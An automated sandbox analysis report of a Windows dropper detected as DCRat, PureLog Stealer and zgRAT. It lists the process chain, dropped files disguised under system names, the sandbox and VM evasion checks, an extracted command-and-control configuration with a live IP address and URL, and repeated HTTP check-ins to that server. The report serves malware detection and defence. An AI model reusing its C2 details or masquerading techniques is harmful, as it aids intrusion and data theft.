Windows Analysis Report
voed9G7p5s.exe

Overview

General Information

Sample name:voed9G7p5s.exe
renamed because original name is a hash value
Original sample name:0e22e05075402fd6fc2f0a833d49c288.exe
Analysis ID:1582936
MD5:0e22e05075402fd6fc2f0a833d49c288
SHA1:eb40fec691901a96a77df716902f04ddc3debf24
SHA256:e232d303d7c90ed82cc677f170e466159d2ffbf3aad45a225cc545e9efb8cf07
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • voed9G7p5s.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\voed9G7p5s.exe" MD5: 0E22E05075402FD6FC2F0A833D49C288)
    • wscript.exe (PID: 6772 cmdline: "C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7088 cmdline: C:\Windows\system32\cmd.exe /c ""C:\savesSession\4pVzEVKfbvkCEJ9qYser3z0xImhTTPHqTDWOugPvvPYsbZ7.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ComponentBrokermonitor.exe (PID: 3492 cmdline: "C:\savesSession/ComponentBrokermonitor.exe" MD5: 43D19D8B3DF29BDFB6AB0D58C3E64424)
          • cmd.exe (PID: 5960 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3452 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 3228 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • RuntimeBroker.exe (PID: 6340 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: 43D19D8B3DF29BDFB6AB0D58C3E64424)
  • cleanup
{"C2 url": "http://185.239.51.56/externalVmpacketlongpollSqldbFloweruniversalCentral", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
C:\savesSession\ComponentBrokermonitor.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\savesSession\ComponentBrokermonitor.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Users\Default\Videos\OfficeClickToRun.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Users\Default\Videos\OfficeClickToRun.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\jDownloader\config\dllhost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
(7 more entries not shown)

Source | Rule | Description | Author | Strings
00000000.00000003.1646097008.0000000006A4E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000004.00000000.1733341807.0000000000982000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
(2 more entries not shown)

Source | Rule | Description | Author | Strings
4.0.ComponentBrokermonitor.exe.980000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
4.0.ComponentBrokermonitor.exe.980000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                          System Summary

                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\savesSession\ComponentBrokermonitor.exe, ProcessId: 3492, TargetFilename: C:\Program Files (x86)\jdownloader\config\dllhost.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Recovery\RuntimeBroker.exe" , CommandLine: "C:\Recovery\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Recovery\RuntimeBroker.exe, NewProcessName: C:\Recovery\RuntimeBroker.exe, OriginalFileName: C:\Recovery\RuntimeBroker.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5960, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Recovery\RuntimeBroker.exe" , ProcessId: 6340, ProcessName: RuntimeBroker.exe
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\voed9G7p5s.exe", ParentImage: C:\Users\user\Desktop\voed9G7p5s.exe, ParentProcessId: 6588, ParentProcessName: voed9G7p5s.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe" , ProcessId: 6772, ProcessName: wscript.exe
                          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                          2025-01-01T02:27:13.424963+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 185.239.51.56 | 80 | TCP

                          AV Detection

                          Source: http://185.239.51.56/externalVmpacketlongpollSqldbFloweruniversalCentral.phpAvira URL Cloud: Label: malware
                          Source: C:\savesSession\ComponentBrokermonitor.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\MqhNXtrC.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                          Source: C:\savesSession\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Program Files (x86)\jDownloader\config\dllhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\HCaVYTBq.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                          Source: C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                          Source: C:\Users\Default\Videos\OfficeClickToRun.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\gNqaUEQu.logAvira: detection malicious, Label: TR/Agent.jbwuj
                          Source: C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Users\user\Desktop\jpaRTMbF.logAvira: detection malicious, Label: TR/Agent.jbwuj
                          Source: C:\Recovery\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: 00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://185.239.51.56/externalVmpacketlongpollSqldbFloweruniversalCentral", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                          Source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exeReversingLabs: Detection: 55%
                          Source: C:\Program Files (x86)\jDownloader\config\dllhost.exeReversingLabs: Detection: 55%
                          Source: C:\Recovery\RuntimeBroker.exeReversingLabs: Detection: 55%
                          Source: C:\Users\Default\Videos\OfficeClickToRun.exeReversingLabs: Detection: 55%
                          Source: C:\Users\user\Desktop\ERuFRGqx.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\HCaVYTBq.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\HufwPOBJ.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\MqhNXtrC.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\PYnlzHQq.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\eKDszVMz.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\gNqaUEQu.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\jpaRTMbF.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\vomPhMaQ.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\yIzGwiSf.logReversingLabs: Detection: 25%
                          Source: C:\savesSession\ComponentBrokermonitor.exeReversingLabs: Detection: 55%
                          Source: C:\savesSession\winlogon.exeReversingLabs: Detection: 55%
                          Source: voed9G7p5s.exeVirustotal: Detection: 58%
                          Source: voed9G7p5s.exeReversingLabs: Detection: 71%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                          Source: C:\savesSession\ComponentBrokermonitor.exeJoe Sandbox ML: detected
                          Source: C:\savesSession\winlogon.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\jDownloader\config\dllhost.exeJoe Sandbox ML: detected
                          Source: C:\Users\Default\Videos\OfficeClickToRun.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\JfKMXbLC.logJoe Sandbox ML: detected
                          Source: C:\Recovery\RuntimeBroker.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\yZRgoalJ.logJoe Sandbox ML: detected
                          Source: voed9G7p5s.exeJoe Sandbox ML: detected
                          Source: 00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["d8uhEIfQa2Fp48ca8Uml58o22vAtJG5vOW541mJMUeNna5wJvoT0cKXfT2pTIvHU6UbhDhiVLaRbvBc6907fxESE8ak960EiW2qFeOGNF7pC26tSZtURxmh1CXjn6jYV","554f049d678a045e30ca1c0b02f850d36d0223cd7b5055b518f68280165f163e","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGtTRW94V2xOSmMwbHFUV2xQYVVvd1kyNVdiRWxwZDJsT1EwazJTVzVTZVdSWFZXbE1RMGt4U1dwdmFXUklTakZhVTBselNXcFphVTlwU2pCamJsWnNTV2wzYVU1NVNUWkpibEo1WkZkVmFVeERTVFJKYW05cFpFaEtNVnBUU1hOSmFtdHBUMmxLTUdOdVZteEphWGRwVFZSQmFVOXBTakJqYmxac1NXbDNhVTFVUldsUGFVb3dZMjVXYkVscGQybE5WRWxwVDJsS01HTnVWbXhKYVhkcFRWUk5hVTlwU2pCamJsWnNTV2wzYVUxVVVXbFBhVW93WTI1V2JFbHVNRDBpWFE9PSJd"]
                          Source: 00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://185.239.51.56/","externalVmpacketlongpollSqldbFloweruniversalCentral"]]
                          Source: voed9G7p5s.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: voed9G7p5s.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: voed9G7p5s.exe
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E0A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00E0A69B
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00E1C220
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\AppData
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\AppData\Local
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4x nop then jmp 00007FFD9BAD1576h4_2_00007FFD9BAC086A
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh4_2_00007FFD9BC6A5DD
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9BAE1576h9_2_00007FFD9BAD086A
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh9_2_00007FFD9BC7A5DD

                          Networking

                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49732 -> 185.239.51.56:80
                          Source: Joe Sandbox ViewASN Name: MGNHOST-ASRU MGNHOST-ASRU
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: multipart/form-data; boundary=----4k4tMK3G3KPi7KkCKThjRxh2CLpKVewxphUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 112350Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2496Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1572Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
